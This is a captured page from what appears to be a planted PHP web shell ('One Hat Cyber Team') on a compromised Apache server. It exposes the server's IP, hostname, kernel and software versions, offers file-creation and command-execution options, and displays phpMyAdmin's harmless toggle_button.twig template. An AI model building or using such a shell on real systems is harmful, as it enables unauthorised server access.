⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.11
Server IP:
13.127.59.50
Server:
Linux ip-172-31-46-210 5.15.0-1033-aws #37~20.04.1-Ubuntu SMP Fri Mar 17 11:39:30 UTC 2023 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.3-4ubuntu2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
share
/
phpmyadmin
/
templates
/
View File Name :
toggle_button.twig
<div class='wrapper toggleAjax hide'> <div class='toggleButton'> <div title="{% trans 'Click to toggle' %}" class='container {{ state }}'> <img src="{{ pma_theme_image }}toggle-{{ text_dir }}.png" alt='' /> <table class='nospacing nopadding'> <tbody> <tr> <td class='toggleOn'> <span class='hide'>{{ link_on|raw }}</span> <div>{{ toggle_on }}</div> </td> <td><div> </div></td> <td class='toggleOff'> <span class='hide'>{{ link_off|raw }}</span> <div>{{ toggle_off }}</div> </td> </tr> </tbody> </table> <span class='hide callback'>{{ callback }}</span> <span class='hide text_direction'>{{ text_dir }}</span> </div> </div> </div>